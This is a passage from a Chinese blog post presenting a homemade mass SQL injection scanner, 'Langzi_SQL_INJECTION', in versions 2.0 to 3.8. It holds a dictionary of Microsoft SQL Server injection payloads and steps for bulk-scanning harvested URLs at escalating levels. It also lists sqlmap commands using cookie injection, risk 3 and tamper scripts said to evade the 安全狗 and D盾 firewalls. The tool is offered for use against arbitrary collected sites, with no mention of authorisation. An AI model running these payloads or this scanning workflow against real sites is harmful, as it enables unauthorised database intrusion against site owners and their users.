         'payload': ' ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))',
         'level': '1'},
    "INJPAY_43":
        {
            'comparsion': ' ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))',
            'dbms': 'Microsoft SQL Server',
            'payload': ' ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))',
            'level': '1'},
    "INJPAY_42":
        {
            'comparsion': ' ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))',
            'dbms': 'Microsoft SQL Server',
            'payload': ' ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))',
            'level': '1'}
}

使用方法

采集一些网址,放在一个文本当中

双击启动主程序,根据提示输入

1. 导入采集文本
2. 设置扫描等级
3. 设置进程数

扫描等级:

level 1 : 简单基于报错的GET/POST注入测试
level 2 : 略复杂的基于报错页面的GET/POST注入测试
level 3 : 复杂的基于报错页面的GET/POST注入测试
level 4 : 复杂的基于BOOL类型的GET/POST盲注测试

默认等级是level 1,注意一下,如果设置level=4的话,前面的三个也会一起扫描的,并不是设置level 4 就只扫描【复杂的基于BOOL类型的GET/POST盲注测试】,比如设置level 2 就会扫描 【 简单基于报错的GET/POST注入测试】 和【略复杂的基于报错页面的GET/POST注入测试】这样子

结果自动保存当前目录下的result.txt当中

页面很简陋,也没有特意的加一些别的颜色输出,结果保存也是很简单的保存在result.txt中,并没有根据时间创建一个html美观显示的文件。

原因很简单,这个2.0其实只是Langzi_Api中检测注入的一个插件,稍微提取出来独立成批量扫描网址的程序。

以后还会加入基于Union联合查询的注入方式,肯定还需优化原始代码的,因为加载这么多payload消耗时间比较多,暂时先把这个框架搭建出来吧。

Langzi_SQL_INJECTION_3.2

开发手册

群里有群基佬反馈误报很多,还表示误报多很正常,真是太伤我心了,剪了个板寸奋发图强,更新3.2版本,不移植部分功能了,直接基于sqlmap封装成一个体系,达到100%验证成功。

  1. 普通的注入测试
  2. post和cookie注入测试
  3. 加载脚本简单测试
  4. 加载脚本对post和cookie测试
  5. 加载脚本对高level测试,设置随机请求头等等优化
  6. 加载前面的全部验证功能一起验证,如果其中有一个返回了成功注入结果就停止验证。

  1. sqlmap.py -u url –batch
  2. sqlmap.py -u url –batch –cookie ‘id=1’ –level=2
  3. sqlmap.py -u url –batch –tamper=killdog.py
  4. sqlmap.py -u url –batch –cookie ‘id=1’ –level=2 –tamper=’killdog.py’
  5. sqlmap.py -u url –batch –tamper=killdog.py –delay 2 –time-sec=15 –timeout=20 –level 5 –risk 3 –random-agent

精简python2.7 的32版本,加上sqlmap的1.2.11.6版本一共50M,加上原文件一共60M…

使用说明

随便采集一些网址随便放在随便的一个随便文本里,带http不带http都可以。

然后启动主程序,把文本拖进去,设置扫描的等级,设置进程数,等待结果….

使用的脚本位置在

F:\CODE\Langzi_Api\GET_SQL\lib\sqlmap\tamper\space2comment.py

换脚本的话,直接更换space2comment.py这个文件的内容。

可以换成过狗,D盾之类的tamper。

会在当前目录下生成日志文件和扫描成功的结果,可以根据日志文件中内容查看sqlmap注入过程和命令,以及一些异常报错情况,结果文件很简洁直观,我感觉可以直接复制一下然后稍微编辑提交漏洞平台了。

返回结果格式内容是这样的,在result.txt中自动生成

Langzi_SQL_INJECTION_3.3

更新功能:

  1. 已更新tamper,可以绕过低系列的安全狗和D盾
  2. 生成的结果更加简洁直观
  3. 支持扫描动态链接和伪静态网页

生成的结果更加智能化

Langzi_SQL_INJECTION_3.7

生成结果更加详细

Langzi_SQL_INJECTION_3.8 终结版

稍微修改生成结果页面,不出意外的话,以后不会再更新了

坚持原创技术分享,您的支持将鼓励我继续创作!
------ 本文结束 ------

版权声明

LangZi_Blog's by Jy Xie is licensed under a Creative Commons BY-NC-ND 4.0 International License
由浪子LangZi创作并维护的Langzi_Blog's博客采用创作共用保留署名-非商业-禁止演绎4.0国际许可证
本文首发于Langzi_Blog's 博客( http://langzi.fun ),版权所有,侵权必究。

0%